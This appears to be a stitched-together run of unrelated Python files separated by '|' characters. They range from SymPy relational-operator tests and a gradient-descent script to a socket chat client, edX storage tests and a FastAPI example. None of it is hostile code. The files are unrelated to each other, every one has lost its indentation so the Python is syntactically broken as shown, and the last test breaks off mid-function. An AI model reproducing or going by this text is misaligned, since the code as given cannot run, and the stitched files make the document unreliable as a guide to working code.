assert Lt(0, 1) is S.true
assert Lt(1, 0) is S.false
assert Le(0, 1) is S.true
assert Le(1, 0) is S.false
assert Le(0, 0) is S.true
assert Gt(1, 0) is S.true
assert Gt(0, 1) is S.false
assert Ge(1, 0) is S.true
assert Ge(0, 1) is S.false
assert Ge(1, 1) is S.true
assert Eq(I, 2) is S.false
assert Ne(I, 2) is S.true
raises(TypeError, lambda: Gt(I, 2))
raises(TypeError, lambda: Ge(I, 2))
raises(TypeError, lambda: Lt(I, 2))
raises(TypeError, lambda: Le(I, 2))
a = Float('.000000000000000000001', '')
b = Float('.0000000000000000000001', '')
assert Eq(pi + a, pi + b) is S.false
def test_rich_cmp():
assert (x < y) == Lt(x, y)
assert (x <= y) == Le(x, y)
assert (x > y) == Gt(x, y)
assert (x >= y) == Ge(x, y)
def test_doit():
from sympy import Symbol
p = Symbol('p', positive=True)
n = Symbol('n', negative=True)
np = Symbol('np', nonpositive=True)
nn = Symbol('nn', nonnegative=True)
assert Gt(p, 0).doit() is S.true
assert Gt(p, 1).doit() == Gt(p, 1)
assert Ge(p, 0).doit() is S.true
assert Le(p, 0).doit() is S.false
assert Lt(n, 0).doit() is S.true
assert Le(np, 0).doit() is S.true
assert Gt(nn, 0).doit() == Gt(nn, 0)
assert Lt(nn, 0).doit() is S.false
assert Eq(x, 0).doit() == Eq(x, 0)
def test_new_relational():
x = Symbol('x')
assert Eq(x) == Relational(x, 0) # None ==> Equality
assert Eq(x) == Relational(x, 0, '==')
assert Eq(x) == Relational(x, 0, 'eq')
assert Eq(x) == Equality(x, 0)
assert Eq(x, -1) == Relational(x, -1) # None ==> Equality
assert Eq(x, -1) == Relational(x, -1, '==')
assert Eq(x, -1) == Relational(x, -1, 'eq')
assert Eq(x, -1) == Equality(x, -1)
assert Eq(x) != Relational(x, 1) # None ==> Equality
assert Eq(x) != Relational(x, 1, '==')
assert Eq(x) != Relational(x, 1, 'eq')
assert Eq(x) != Equality(x, 1)
assert Eq(x, -1) != Relational(x, 1) # None ==> Equality
assert Eq(x, -1) != Relational(x, 1, '==')
assert Eq(x, -1) != Relational(x, 1, 'eq')
assert Eq(x, -1) != Equality(x, 1)
assert Ne(x, 0) == Relational(x, 0, '!=')
assert Ne(x, 0) == Relational(x, 0, '<>')
assert Ne(x, 0) == Relational(x, 0, 'ne')
assert Ne(x, 0) == Unequality(x, 0)
assert Ne(x, 0) != Relational(x, 1, '!=')
assert Ne(x, 0) != Relational(x, 1, '<>')
assert Ne(x, 0) != Relational(x, 1, 'ne')
assert Ne(x, 0) != Unequality(x, 1)
assert Ge(x, 0) == Relational(x, 0, '>=')
assert Ge(x, 0) == Relational(x, 0, 'ge')
assert Ge(x, 0) == GreaterThan(x, 0)
assert Ge(x, 1) != Relational(x, 0, '>=')
assert Ge(x, 1) != Relational(x, 0, 'ge')
assert Ge(x, 1) != GreaterThan(x, 0)
assert (x >= 1) == Relational(x, 1, '>=')
assert (x >= 1) == Relational(x, 1, 'ge')
assert (x >= 1) == GreaterThan(x, 1)
assert (x >= 0) != Relational(x, 1, '>=')
assert (x >= 0) != Relational(x, 1, 'ge')
assert (x >= 0) != GreaterThan(x, 1)
assert Le(x, 0) == Relational(x, 0, '<=')
assert Le(x, 0) == Relational(x, 0, 'le')
assert Le(x, 0) == LessThan(x, 0)
assert Le(x, 1) != Relational(x, 0, '<=')
assert Le(x, 1) != Relational(x, 0, 'le')
assert Le(x, 1) != LessThan(x, 0)
assert (x <= 1) == Relational(x, 1, '<=')
assert (x <= 1) == Relational(x, 1, 'le')
assert (x <= 1) == LessThan(x, 1)
assert (x <= 0) != Relational(x, 1, '<=')
assert (x <= 0) != Relational(x, 1, 'le')
assert (x <= 0) != LessThan(x, 1)
assert Gt(x, 0) == Relational(x, 0, '>')
assert Gt(x, 0) == Relational(x, 0, 'gt')
assert Gt(x, 0) == StrictGreaterThan(x, 0)
assert Gt(x, 1) != Relational(x, 0, '>')
assert Gt(x, 1) != Relational(x, 0, 'gt')
assert Gt(x, 1) != StrictGreaterThan(x, 0)
assert (x > 1) == Relational(x, 1, '>')
assert (x > 1) == Relational(x, 1, 'gt')
assert (x > 1) == StrictGreaterThan(x, 1)
assert (x > 0) != Relational(x, 1, '>')
assert (x > 0) != Relational(x, 1, 'gt')
assert (x > 0) != StrictGreaterThan(x, 1)
assert Lt(x, 0) == Relational(x, 0, '<')
assert Lt(x, 0) == Relational(x, 0, 'lt')
assert Lt(x, 0) == StrictLessThan(x, 0)
assert Lt(x, 1) != Relational(x, 0, '<')
assert Lt(x, 1) != Relational(x, 0, 'lt')
assert Lt(x, 1) != StrictLessThan(x, 0)
assert (x < 1) == Relational(x, 1, '<')
assert (x < 1) == Relational(x, 1, 'lt')
assert (x < 1) == StrictLessThan(x, 1)
assert (x < 0) != Relational(x, 1, '<')
assert (x < 0) != Relational(x, 1, 'lt')
assert (x < 0) != StrictLessThan(x, 1)
# finally, some fuzz testing
from random import randint
from sympy.core.compatibility import unichr
for i in range(100):
while 1:
strtype, length = (unichr, 65535) if randint(0, 1) else (chr, 255)
relation_type = strtype(randint(0, length))
if randint(0, 1):
relation_type += strtype(randint(0, length))
if relation_type not in ('==', 'eq', '!=', '<>', 'ne', '>=', 'ge',
'<=', 'le', '>', 'gt', '<', 'lt', ':=',
'+=', '-=', '*=', '/=', '%='):
break
raises(ValueError, lambda: Relational(x, 1, relation_type))
assert all(Relational(x, 0, op).rel_op == '==' for op in ('eq', '=='))
assert all(Relational(x, 0, op).rel_op == '!=' for op in ('ne', '<>', '!='))
assert all(Relational(x, 0, op).rel_op == '>' for op in ('gt', '>'))
assert all(Relational(x, 0, op).rel_op == '<' for op in ('lt', '<'))
assert all(Relational(x, 0, op).rel_op == '>=' for op in ('ge', '>='))
assert all(Relational(x, 0, op).rel_op == '<=' for op in ('le', '<='))
def test_relational_bool_output():
# https://github.com/sympy/sympy/issues/5931
raises(TypeError, lambda: bool(x > 3))
raises(TypeError, lambda: bool(x >= 3))
raises(TypeError, lambda: bool(x < 3))
raises(TypeError, lambda: bool(x <= 3))
raises(TypeError, lambda: bool(Eq(x, 3)))
raises(TypeError, lambda: bool(Ne(x, 3)))
def test_relational_logic_symbols():
# See issue 6204
assert (x < y) & (z < t) == And(x < y, z < t)
assert (x < y) | (z < t) == Or(x < y, z < t)
assert ~(x < y) == Not(x < y)
assert (x < y) >> (z < t) == Implies(x < y, z < t)
assert (x < y) << (z < t) == Implies(z < t, x < y)
assert (x < y) ^ (z < t) == Xor(x < y, z < t)
assert isinstance((x < y) & (z < t), And)
assert isinstance((x < y) | (z < t), Or)
assert isinstance(~(x < y), GreaterThan)
assert isinstance((x < y) >> (z < t), Implies)
assert isinstance((x < y) << (z < t), Implies)
assert isinstance((x < y) ^ (z < t), (Or, Xor))
def test_univariate_relational_as_set():
assert (x > 0).as_set() == Interval(0, oo, True, True)
assert (x >= 0).as_set() == Interval(0, oo)
assert (x < 0).as_set() == Interval(-oo, 0, True, True)
assert (x <= 0).as_set() == Interval(-oo, 0)
assert Eq(x, 0).as_set() == FiniteSet(0)
assert Ne(x, 0).as_set() == Interval(-oo, 0, True, True) + \
Interval(0, oo, True, True)
assert (x**2 >= 4).as_set() == Interval(-oo, -2) + Interval(2, oo)
@XFAIL
def test_multivariate_relational_as_set():
assert (x*y >= 0).as_set() == Interval(0, oo)*Interval(0, oo) + \
Interval(-oo, 0)*Interval(-oo, 0)
def test_Not():
assert Not(Equality(x, y)) == Unequality(x, y)
assert Not(Unequality(x, y)) == Equality(x, y)
assert Not(StrictGreaterThan(x, y)) == LessThan(x, y)
assert Not(StrictLessThan(x, y)) == GreaterThan(x, y)
assert Not(GreaterThan(x, y)) == StrictLessThan(x, y)
assert Not(LessThan(x, y)) == StrictGreaterThan(x, y)
def test_evaluate():
assert str(Eq(x, x, evaluate=False)) == 'Eq(x, x)'
assert Eq(x, x, evaluate=False).doit() == S.true
assert str(Ne(x, x, evaluate=False)) == 'Ne(x, x)'
assert Ne(x, x, evaluate=False).doit() == S.false
assert str(Ge(x, x, evaluate=False)) == 'x >= x'
assert str(Le(x, x, evaluate=False)) == 'x <= x'
assert str(Gt(x, x, evaluate=False)) == 'x > x'
assert str(Lt(x, x, evaluate=False)) == 'x < x'
def assert_all_ineq_raise_TypeError(a, b):
raises(TypeError, lambda: a > b)
raises(TypeError, lambda: a >= b)
raises(TypeError, lambda: a < b)
raises(TypeError, lambda: a <= b)
raises(TypeError, lambda: b > a)
raises(TypeError, lambda: b >= a)
raises(TypeError, lambda: b < a)
raises(TypeError, lambda: b <= a)
def assert_all_ineq_give_class_Inequality(a, b):
"""All inequality operations on `a` and `b` result in class Inequality."""
from sympy.core.relational import _Inequality as Inequality
assert isinstance(a > b, Inequality)
assert isinstance(a >= b, Inequality)
assert isinstance(a < b, Inequality)
assert isinstance(a <= b, Inequality)
assert isinstance(b > a, Inequality)
assert isinstance(b >= a, Inequality)
assert isinstance(b < a, Inequality)
assert isinstance(b <= a, Inequality)
def test_imaginary_compare_raises_TypeError():
# See issue #5724
assert_all_ineq_raise_TypeError(I, x)
def test_complex_compare_not_real():
# two cases which are not real
y = Symbol('y', imaginary=True)
z = Symbol('z', complex=True, real=False)
for w in (y, z):
assert_all_ineq_raise_TypeError(2, w)
# some cases which should remain un-evaluated
t = Symbol('t')
x = Symbol('x', real=True)
z = Symbol('z', complex=True)
for w in (x, z, t):
assert_all_ineq_give_class_Inequality(2, w)
def test_imaginary_and_inf_compare_raises_TypeError():
# See pull request #7835
y = Symbol('y', imaginary=True)
assert_all_ineq_raise_TypeError(oo, y)
assert_all_ineq_raise_TypeError(-oo, y)
def test_complex_pure_imag_not_ordered():
raises(TypeError, lambda: 2*I < 3*I)
# more generally
x = Symbol('x', real=True, nonzero=True)
y = Symbol('y', imaginary=True)
z = Symbol('z', complex=True)
assert_all_ineq_raise_TypeError(I, y)
t = I*x # an imaginary number, should raise errors
assert_all_ineq_raise_TypeError(2, t)
t = -I*y # a real number, so no errors
assert_all_ineq_give_class_Inequality(2, t)
t = I*z # unknown, should be unevaluated
assert_all_ineq_give_class_Inequality(2, t)
def test_x_minus_y_not_same_as_x_lt_y():
"""
A consequence of pull request #7792 is that `x - y < 0` and `x < y`
are not synonymous.
"""
x = I + 2
y = I + 3
raises(TypeError, lambda: x < y)
assert x - y < 0
ineq = Lt(x, y, evaluate=False)
raises(TypeError, lambda: ineq.doit())
assert ineq.lhs - ineq.rhs < 0
t = Symbol('t', imaginary=True)
x = 2 + t
y = 3 + t
ineq = Lt(x, y, evaluate=False)
raises(TypeError, lambda: ineq.doit())
assert ineq.lhs - ineq.rhs < 0
# this one should give error either way
x = I + 2
y = 2*I + 3
raises(TypeError, lambda: x < y)
raises(TypeError, lambda: x - y < 0)
def test_nan_equality_exceptions():
# See issue #7774
import random
assert Equality(nan, nan) is S.false
assert Unequality(nan, nan) is S.true
# See issue #7773
A = (x, S(0), S(1)/3, pi, oo, -oo)
assert Equality(nan, random.choice(A)) is S.false
assert Equality(random.choice(A), nan) is S.false
assert Unequality(nan, random.choice(A)) is S.true
assert Unequality(random.choice(A), nan) is S.true
def test_nan_inequality_raise_errors():
# See discussion in pull request #7776. We test inequalities with
# a set including examples of various classes.
for q in (x, S(0), S(10), S(1)/3, pi, S(1.3), oo, -oo, nan):
assert_all_ineq_raise_TypeError(q, nan)
def test_nan_complex_inequalities():
# Comparisons of NaN with non-real raise errors, we're not too
# fussy whether its the NaN error or complex error.
for r in (I, zoo, Symbol('z', imaginary=True)):
assert_all_ineq_raise_TypeError(r, nan)
def test_complex_infinity_inequalities():
raises(TypeError, lambda: zoo > 0)
raises(TypeError, lambda: zoo >= 0)
raises(TypeError, lambda: zoo < 0)
raises(TypeError, lambda: zoo <= 0)
def test_inequalities_symbol_name_same():
"""Using the operator and functional forms should give same results."""
# We test all combinations from a set
# FIXME: could replace with random selection after test passes
A = (x, y, S(0), S(1)/3, pi, oo, -oo)
for a in A:
for b in A:
assert Gt(a, b) == (a > b)
assert Lt(a, b) == (a < b)
assert Ge(a, b) == (a >= b)
assert Le(a, b) == (a <= b)
for b in (y, S(0), S(1)/3, pi, oo, -oo):
assert Gt(x, b, evaluate=False) == (x > b)
assert Lt(x, b, evaluate=False) == (x < b)
assert Ge(x, b, evaluate=False) == (x >= b)
assert Le(x, b, evaluate=False) == (x <= b)
for b in (y, S(0), S(1)/3, pi, oo, -oo):
assert Gt(b, x, evaluate=False) == (b > x)
assert Lt(b, x, evaluate=False) == (b < x)
assert Ge(b, x, evaluate=False) == (b >= x)
assert Le(b, x, evaluate=False) == (b <= x)
def test_inequalities_symbol_name_same_complex():
"""Using the operator and functional forms should give same results.
With complex non-real numbers, both should raise errors.
"""
# FIXME: could replace with random selection after test passes
for a in (x, S(0), S(1)/3, pi, oo):
raises(TypeError, lambda: Gt(a, I))
raises(TypeError, lambda: a > I)
raises(TypeError, lambda: Lt(a, I))
raises(TypeError, lambda: a < I)
raises(TypeError, lambda: Ge(a, I))
raises(TypeError, lambda: a >= I)
raises(TypeError, lambda: Le(a, I))
raises(TypeError, lambda: a <= I)
def test_inequalities_cant_sympify_other():
# see issue 7833
from operator import gt, lt, ge, le
bar = "foo"
for a in (x, S(0), S(1)/3, pi, I, zoo, oo, -oo, nan):
for op in (lt, gt, le, ge):
raises(TypeError, lambda: op(a, bar))
def test_ineq_avoid_wild_symbol_flip():
# see issue #7951, we try to avoid this internally, e.g., by using
# __lt__ instead of "<".
from sympy.core.symbol import Wild
p = symbols('p', cls=Wild)
# x > p might flip, but Gt should not:
assert Gt(x, p) == Gt(x, p, evaluate=False)
# Previously failed as 'p > x':
e = Lt(x, y).subs({y: p})
assert e == Lt(x, p, evaluate=False)
# Previously failed as 'p <= x':
e = Ge(x, p).doit()
assert e == Ge(x, p, evaluate=False)
def test_issue_8245():
a = S("6506833320952669167898688709329/5070602400912917605986812821504")
q = a.n(10)
assert (a == q) is True
assert (a != q) is False
assert (a > q) == False
assert (a < q) == False
assert (a >= q) == True
assert (a <= q) == True
a = sqrt(2)
r = Rational(str(a.n(30)))
assert (r == a) is False
assert (r != a) is True
assert (r > a) == True
assert (r < a) == False
assert (r >= a) == True
assert (r <= a) == False
a = sqrt(2)
r = Rational(str(a.n(29)))
assert (r == a) is False
assert (r != a) is True
assert (r > a) == False
assert (r < a) == True
assert (r >= a) == False
assert (r <= a) == True
assert Eq(log(cos(2)**2 + sin(2)**2), 0) == True
def test_issue_8449():
p = Symbol('p', nonnegative=True)
assert Lt(-oo, p)
assert Ge(-oo, p) is S.false
assert Gt(oo, -p)
assert Le(oo, -p) is S.false
def test_simplify():
assert simplify(x*(y + 1) - x*y - x + 1 < x) == (x > 1)
r = S(1) < -x
# until relationals have an _eval_simplify method
# if there is no simplification to do on either side
# the only the canonical form is returned
assert simplify(r) == r.canonical
def test_equals():
w, x, y, z = symbols('w:z')
f = Function('f')
assert Eq(x, 1).equals(Eq(x*(y + 1) - x*y - x + 1, x))
assert Eq(x, y).equals(x < y, True) == False
assert Eq(x, f(1)).equals(Eq(x, f(2)), True) == f(1) - f(2)
assert Eq(f(1), y).equals(Eq(f(2), y), True) == f(1) - f(2)
assert Eq(x, f(1)).equals(Eq(f(2), x), True) == f(1) - f(2)
assert Eq(f(1), x).equals(Eq(x, f(2)), True) == f(1) - f(2)
assert Eq(w, x).equals(Eq(y, z), True) == False
assert Eq(f(1), f(2)).equals(Eq(f(3), f(4)), True) == f(1) - f(3)
assert (x < y).equals(y > x, True) == True
assert (x < y).equals(y >= x, True) == False
assert (x < y).equals(z < y, True) == False
assert (x < y).equals(x < z, True) == False
assert (x < f(1)).equals(x < f(2), True) == f(1) - f(2)
assert (f(1) < x).equals(f(2) < x, True) == f(1) - f(2)
def test_reversed():
assert (x < y).reversed == (y > x)
assert (x <= y).reversed == (y >= x)
assert Eq(x, y, evaluate=False).reversed == Eq(y, x, evaluate=False)
assert Ne(x, y, evaluate=False).reversed == Ne(y, x, evaluate=False)
assert (x >= y).reversed == (y <= x)
assert (x > y).reversed == (y < x)
def test_canonical():
c = [i.canonical for i in (
x + y < z,
x + 2 > 3,
x < 2,
S(2) > x,
x**2 > -x/y,
Gt(3, 2, evaluate=False)
)]
assert [i.canonical for i in c] == c
assert [i.reversed.canonical for i in c] == c
assert not any(i.lhs.is_Number and not i.rhs.is_Number for i in c)
c = [i.reversed.func(i.rhs, i.lhs, evaluate=False).canonical for i in c]
assert [i.canonical for i in c] == c
assert [i.reversed.canonical for i in c] == c
assert not any(i.lhs.is_Number and not i.rhs.is_Number for i in c)
@XFAIL
def test_issue_8444():
x = symbols('x', real=True)
assert (x <= oo) == (x >= -oo) == True
x = symbols('x')
assert x >= floor(x)
assert (x < floor(x)) == False
assert Gt(x, floor(x)) == Gt(x, floor(x), evaluate=False)
assert Ge(x, floor(x)) == Ge(x, floor(x), evaluate=False)
assert x <= ceiling(x)
assert (x > ceiling(x)) == False
assert Lt(x, ceiling(x)) == Lt(x, ceiling(x), evaluate=False)
assert Le(x, ceiling(x)) == Le(x, ceiling(x), evaluate=False)
i = symbols('i', integer=True)
assert (i > floor(i)) == False
assert (i < ceiling(i)) == False
def test_issue_10304():
d = cos(1)**2 + sin(1)**2 - 1
assert d.is_comparable is False # if this fails, find a new d
e = 1 + d*I
assert simplify(Eq(e, 0)) is S.false
def test_issue_10401():
x = symbols('x')
fin = symbols('inf', finite=True)
inf = symbols('inf', infinite=True)
inf2 = symbols('inf2', infinite=True)
zero = symbols('z', zero=True)
nonzero = symbols('nz', zero=False, finite=True)
assert Eq(1/(1/x + 1), 1).func is Eq
assert Eq(1/(1/x + 1), 1).subs(x, S.ComplexInfinity) is S.true
assert Eq(1/(1/fin + 1), 1) is S.false
T, F = S.true, S.false
assert Eq(fin, inf) is F
assert Eq(inf, inf2) is T and inf != inf2
assert Eq(inf/inf2, 0) is F
assert Eq(inf/fin, 0) is F
assert Eq(fin/inf, 0) is T
assert Eq(zero/nonzero, 0) is T and ((zero/nonzero) != 0)
assert Eq(inf, -inf) is F
assert Eq(fin/(fin + 1), 1) is S.false
o = symbols('o', odd=True)
assert Eq(o, 2*o) is S.false
p = symbols('p', positive=True)
assert Eq(p/(p - 1), 1) is F
def test_issue_10633():
assert Eq(True, False) == False
assert Eq(False, True) == False
assert Eq(True, True) == True
assert Eq(False, False) == True
def test_issue_10927():
x = symbols('x')
assert str(Eq(x, oo)) == 'Eq(x, oo)'
assert str(Eq(x, -oo)) == 'Eq(x, -oo)'
|
instructions = [line.strip().split(" ") for line in open("input.txt", "r")]
h_pos = 0
depth = 0
aim = 0
for i in instructions:
num = int(i[1])
# Structural Pattern Matching only in Python 3.10 - https://www.python.org/dev/peps/pep-0622/
match i[0]:
case 'forward':
h_pos += num
depth += aim * num
case 'down':
aim += num
case 'up':
aim -= num
print(f"Final horizonal position: {h_pos} - Final depth: {depth} - Multiplied: {h_pos * depth}")
|
# Once upon a time, in 2020 we discovered that
# some texts would be in incorrectly tokenized into words in the UI of Zeeguu.
#
# The problem was always around an å character
#
# Turns out that although visually the letter is the same there
# are two possibilities of representing the letter in unicode:
# 1. latin small letter a with ring above
# 2. latin small letter a + ̊ combining ring above
# When the second would happen in a text, the tokenizer
# would break.
import unicodedata
def flatten_composed_unicode_characters(content):
# Normalization mode can be :
# -- NFC, or 'Normal Form Composed' returns composed characters
# -- NFD, 'Normal Form Decomposed' gives decomposed, combined characters
# -- ...
# We thus use NFC
#
# (See also: https://stackoverflow.com/a/16467505/1200070)
return unicodedata.normalize('NFC', content)
|
import numpy as np
import sys
import matplotlib.pyplot as pl
## returns the predicted y (based on feature dataset (X) and weights (Theta))
def f(X,th):
return X.dot(th.T)
## returns the cost (residual error) for predicted y
def J(X,y,th):
m=X.shape[0]
y_hat=X.dot(th.T)
cost=np.sum((y_hat-y)**2)/(2*m)
return cost
## finds the "good" values for the weigths (Theta)
## Gradient descent (optmization function)
def GD (X,y,th,alpha,niters):
m=X.shape[0]
cost=np.zeros((niters,1))
for i in range(0,niters):
y_hat=X.dot(th.T)
error=((y_hat-y)*X).sum(0)/m
th = th-(alpha*(error))
cost[i]=J(X,y,th)
return th,cost
def featureScaling(X):
X=X-np.min(X,0)
den=np.max(X,0)-np.min(X,0)
return X/den
def RMSE(X,y,th):
m=X.shape[0]
y_hat=f(X,th)
error=((y_hat-y)**2).sum()/m
return np.sqrt(error)
if __name__ == "__main__":
if len(sys.argv) < 1:
print('Usage: python %s <dataset file name (full path)>' % sys.argv[0])
exit(0)
try:
fin=open(sys.argv[1]) ## open the dataset file
except:
print('Could not open',sys.argv[1])
exit(0)
## rows will be a list of list, e.g., [[example 1],[example 2],...[example m]]
rows=[l.split(',') for l in fin.readlines()] ## the values are separated by comma
m=len(rows) ## how many lists rows has, i.e., how many examples in the dataset
## how many features are in a given list
d = len(rows[0])-1 ## we subtract the result from 1 to discard the label (y)
y = np.array([l[d:d+1] for l in rows],dtype=float) ## vector of dataset labels
X = np.array([l[0:d] for l in rows],dtype=float) ## matrix of dataset features
### Feature scaling
Xori=X.copy() ## save the original X
X=featureScaling(X)
Theta=np.zeros((1,d+1)) ## Initialize Theta with zeros
X=np.insert(X,0,1,axis=1) ## inserts a column of 1's
tsize=int(m*0.7) ## size of the training set
Xtr=X[:tsize,:] ## from the first row to tsize-1, all colmuns
Xte=X[tsize:,:] ## from the tsize row to the end, all columns
ytr=y[:tsize]
yte=y[tsize:]
### Call gradient descent to find the "good" values to Theta
Theta,cost=GD(Xtr,ytr,Theta,0.000001,2000)
pl.plot(cost)
pl.show()
print('RMSE:',RMSE(Xte,yte,Theta))
if d>1:
print('Sorry, we cannot plot more than 1 feature')
exit(0)
## predict new labels from training set
y_hat=Xtr.dot(Theta.T)
## Plot the predict y's in relation to the ground-truth (y)
## first the X regarding the ground-truth
pl.plot(Xtr[:,1:],ytr,'.',c='b')
## now X regarding the predict values
pl.plot(Xtr[:,1:],y_hat,'-',c='g')
pl.show()
## Now, let's check the performance on the test set
## y_hat is built from Xte, i.e., the test set
y_hat=Xte.dot(Theta.T)
pl.plot(Xte[:,1:],yte,'.',c='b')
## now X regarding the predict values
pl.plot(Xte[:,1:],y_hat,'-',c='g')
pl.show()
print("Test cost", J(Xte,yte,Theta))
|
import sys, socket, select, threading
def prompt(user) :
sys.stdout.write('%s> ' % user)
sys.stdout.flush()
if __name__ == "__main__":
if len(sys.argv) < 3:
print('Usage : python %s user host' % sys.argv[0])
sys.exit()
(user, host), port = sys.argv[1:3], 5001
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try :
server_sock.connect((host, port))
except :
print('Unable to connect')
sys.exit()
print('Start')
def listen():
while True:
read_sockets, write_sockets, error_sockets = select.select([server_sock], [], [])
try:
data = server_sock.recv(4096).decode()
except:
break
sys.stdout.write('\r%s\n' % data)
prompt(user)
print('\rTerminated')
t = threading.Thread(target=listen)
t.start()
prompt(user)
while True:
msg = sys.stdin.readline().strip()
if not msg:
server_sock.close()
break
try:
server_sock.send(('%s| %s' % (user, msg)).encode())
except:
break
prompt(user)
|
"""
Tests for instructor_task/models.py.
"""
import copy
import time
from io import StringIO
import pytest
from django.conf import settings
from django.test import SimpleTestCase, TestCase, override_settings
from opaque_keys.edx.locator import CourseLocator
from common.test.utils import MockS3BotoMixin
from lms.djangoapps.instructor_task.models import TASK_INPUT_LENGTH, InstructorTask, ReportStore
from lms.djangoapps.instructor_task.tests.test_base import TestReportMixin
class TestInstructorTasksModel(TestCase):
"""
Test validations in instructor task model
"""
def test_task_input_valid_length(self):
"""
Test allowed length of task_input field
"""
task_input = 's' * TASK_INPUT_LENGTH
with pytest.raises(AttributeError):
InstructorTask.create(
course_id='dummy_course_id',
task_type='dummy type',
task_key='dummy key',
task_input=task_input,
requester='dummy requester',
)
class ReportStoreTestMixin:
"""
Mixin for report store tests.
"""
def setUp(self):
super().setUp()
self.course_id = CourseLocator(org="testx", course="coursex", run="runx")
def create_report_store(self):
"""
Subclasses should override this and return their report store.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
def test_links_for_order(self):
"""
Test that ReportStore.links_for() returns file download links
in reverse chronological order.
"""
report_store = self.create_report_store() # lint-amnesty, pylint: disable=assignment-from-no-return
assert report_store.links_for(self.course_id) == []
report_store.store(self.course_id, 'old_file', StringIO())
time.sleep(1) # Ensure we have a unique timestamp.
report_store.store(self.course_id, 'middle_file', StringIO())
time.sleep(1) # Ensure we have a unique timestamp.
report_store.store(self.course_id, 'new_file', StringIO())
assert [link[0] for link in report_store.links_for(self.course_id)] == ['new_file', 'middle_file', 'old_file']
class LocalFSReportStoreTestCase(ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the old LocalFSReportStore configuration.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore using the old
LocalFSReportStore configuration.
"""
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class DjangoStorageReportStoreLocalTestCase(ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the DjangoStorageReportStore implementation using the local
filesystem.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore configured to use the
local filesystem for storage.
"""
test_settings = copy.deepcopy(settings.GRADES_DOWNLOAD)
test_settings['STORAGE_KWARGS'] = {'location': settings.GRADES_DOWNLOAD['ROOT_PATH']}
with override_settings(GRADES_DOWNLOAD=test_settings):
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class DjangoStorageReportStoreS3TestCase(MockS3BotoMixin, ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the DjangoStorageReportStore implementation using S3 stubs.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore configured to use S3 for
storage.
"""
test_settings = copy.deepcopy(settings.GRADES_DOWNLOAD)
test_settings['STORAGE_CLASS'] = 'storages.backends.s3boto.S3BotoStorage'
test_settings['STORAGE_KWARGS'] = {
'bucket': settings.GRADES_DOWNLOAD['BUCKET'],
'location': settings.GRADES_DOWNLOAD['ROOT_PATH'],
}
with override_settings(GRADES_DOWNLOAD=test_settings):
self.mocked_connection.create_bucket(settings.GRADES_DOWNLOAD['STORAGE_KWARGS']['bucket'])
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class TestS3ReportStorage(TestCase):
"""
Test the S3ReportStorage to make sure that configuration overrides from settings.FINANCIAL_REPORTS
are used instead of default ones.
"""
def test_financial_report_overrides(self):
"""
Test that CUSTOM_DOMAIN from FINANCIAL_REPORTS is used to construct file url. instead of domain defined via
AWS_S3_CUSTOM_DOMAIN setting.
"""
with override_settings(FINANCIAL_REPORTS={
'STORAGE_TYPE': 's3',
'BUCKET': 'edx-financial-reports',
'CUSTOM_DOMAIN': 'edx-financial-reports.s3.amazonaws.com',
'ROOT_PATH': 'production',
}):
report_store = ReportStore.from_config(config_name="FINANCIAL_REPORTS")
# Make sure CUSTOM_DOMAIN from FINANCIAL_REPORTS is used to construct file url
assert 'edx-financial-reports.s3.amazonaws.com' in report_store.storage.url('')
|
import typing
import numpy
import sklearn
import _pqkmeans
class BKMeans(sklearn.base.BaseEstimator, sklearn.base.ClusterMixin):
def __init__(self, k, input_dim, subspace_dim=8, iteration=10, verbose=False):
super(BKMeans, self).__init__()
self._impl = _pqkmeans.BKMeans(k, input_dim, subspace_dim, iteration, verbose)
def predict_generator(self, x_test):
# type: (typing.Iterable[typing.Iterable[float]]) -> Any
for vec in x_test:
yield self._impl.predict_one(vec)
def fit(self, x_train):
# type: (numpy.array) -> None
assert len(x_train.shape) == 2
self._impl.fit(x_train)
def predict(self, x_test):
# type: (numpy.array) -> Any
assert len(x_test.shape) == 2
return numpy.array(list(self.predict_generator(x_test)))
@property
def labels_(self):
return self._impl.labels_
@property
def cluster_centers_(self):
return self._impl.cluster_centers_
|
"""
pytchat is a lightweight python library to browse youtube livechat without Selenium or BeautifulSoup.
"""
__copyright__ = 'Copyright (C) 2019, 2020, 2021 taizan-hokuto'
__version__ = '0.5.5'
__license__ = 'MIT'
__author__ = 'taizan-hokuto'
__author_email__ = '55448286+taizan-hokuto@users.noreply.github.com'
__url__ = 'https://github.com/taizan-hokuto/pytchat'
from .exceptions import (
ChatParseException,
ResponseContextError,
NoContents,
NoContinuation,
IllegalFunctionCall,
InvalidVideoIdException,
UnknownConnectionError,
RetryExceedMaxCount,
ChatDataFinished,
ReceivedUnknownContinuation,
FailedExtractContinuation,
VideoInfoParseError,
PatternUnmatchError
)
from .api import (
config,
LiveChat,
LiveChatAsync,
ChatProcessor,
CompatibleProcessor,
DummyProcessor,
DefaultProcessor,
HTMLArchiver,
TSVArchiver,
JsonfileArchiver,
SimpleDisplayProcessor,
SpeedCalculator,
SuperchatCalculator,
create
)
# flake8: noqa
|
from fastapi import FastAPI,Query
from typing import Optional
from typing import List
app = FastAPI()
fake_items_db = [{"item_name": "Foo"}, {"item_name": "Bar"}, {"item_name": "Baz"}]
@app.get("/items/")
async def read_item(skip : int = 0, limit:int = 10):
return fake_items_db[skip:skip+limit]
@app.get("/users/{user_id}/items/{item_id}")
async def read_user_item(user_id: int, item_id: str, q: Optional[str] = None, short: bool = False):
item = {"item_id": item_id, "owner_id": user_id}
print(item)
if q:
item.update({"q": q})
if short:
item.update(
{"description": "This is an amazing item that has a long description"}
)
print(item)
return item
@app.get("/item_validation/")
async def read_items1(q:Optional[str] = Query("fixedquery",max_length=50)):
results = {"test" : "a"}
if q:
results.update({"test1":q})
return results
@app.get("/item_list/")
async def list_parameter(q:List[str]=Query(None)):
query_items = {"q": q}
print(query_items)
return query_items
|
from unittest import TestCase
class YamlRulesTest(TestCase):
def test_all_kinds(self):
"""
Test that we've enumerated all the possible values for kind and
kind_detail in the YAML files.
"""
from vectordatasource.meta import find_yaml_path
